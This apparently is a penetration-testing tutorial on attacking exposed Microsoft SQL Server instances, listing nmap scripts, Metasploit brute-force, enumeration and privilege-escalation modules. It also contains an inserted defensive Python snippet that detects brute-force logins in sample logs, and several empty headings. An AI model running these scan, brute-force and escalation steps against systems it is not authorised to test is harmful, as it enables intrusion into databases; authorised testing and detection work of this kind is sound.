Today I am writing about how to attack Windows SQL Server remotely. Sometimes during a penetration test we find SQL Servers exposed on the network; here we will learn how to recognize the server, brute-force it and escalate privileges.

How to Attack Windows SQL Server

Information Gathering

What port is SQL Server Running?

1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM

What version of SQL Server exists?

Scanning SQL Server

msf> use auxiliary/scanner/mssql/mssql_ping

Scanning SQL Server with Nmap

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Default SQL Server Databases

master database: Records all the system-level information for an instance of SQL Server.
model database: Used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model and other database options, are applied to any databases created afterwards.
tempdb database: A workspace for holding temporary objects or intermediate result sets.
resource database: A read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
msdb database: Used by SQL Server Agent for scheduling alerts and jobs.
SQL server default databases

SQL Server Type of Authentication

SQL Server Type of Users

Brute Force SQL Server

msfconsole script

Search useful Scripts

searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql
use auxiliary/scanner/mssql/mssql_login
set rhosts 
set rport 1433
set username fooadmin
set password fooadmin
set verbose true

use auxiliary/admin/mssql/mssql_enum
set rhosts 
set rport 1433
set username fooadmin
set password fooadmin
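As an added example that is not part of the original post, here is the defender's view of the brute-force step above: a Python check that parses SQL Server ERRORLOG "Login failed" lines (the event 18456 message format) and flags a client address that reaches a failure threshold inside a sliding window, plus any later successful login from that same client. The log lines, the thresholds and the login names (`sa`, `fooadmin`, `reportsvc`) are constructed sample data, not a captured log.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines shaped like real logon messages (not a real capture).
SAMPLE_ERRORLOG = """\
2024-05-01 10:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:01.52 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:02.03 Logon       Login failed for user 'fooadmin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:02.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:00:03.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-05-01 10:07:15.77 Logon       Login failed for user 'reportsvc'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
2024-05-01 10:08:00.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.0.0.5]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login (?P<outcome>failed|succeeded) for user '(?P<user>[^']*)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_logon_events(text):
    """Yield (timestamp, outcome, user, client) for each line that is a logon message."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["outcome"], m["user"], m["client"]

def detect_bruteforce(text, threshold=5, window=timedelta(minutes=1)):
    """Return alerts: 'bruteforce' once a client reaches `threshold` failures within
    `window`, and 'success_after_failures' if a flagged client later authenticates."""
    failures = defaultdict(list)   # client -> timestamps of recent failed logins
    users = defaultdict(set)       # client -> login names it tried
    flagged, alerts = set(), []
    for ts, outcome, user, client in parse_logon_events(text):
        if outcome == "failed":
            users[client].add(user)
            # drop failures that have aged out of the sliding window, then add this one
            failures[client] = [t for t in failures[client] if ts - t <= window] + [ts]
            if len(failures[client]) >= threshold and client not in flagged:
                flagged.add(client)
                alerts.append({"type": "bruteforce", "client": client,
                               "attempts": len(failures[client]),
                               "users": sorted(users[client])})
        elif outcome == "succeeded" and client in flagged:
            alerts.append({"type": "success_after_failures", "client": client, "user": user})
    return alerts
```

"Login succeeded" lines only appear when the instance's login auditing is set to record successful logins as well as failed ones, so that second alert depends on that server setting.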

Useful wordlists

Escalate SQL Server Privileges

msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
msf> use auxiliary/admin/mssql/mssql_escalate_execute_as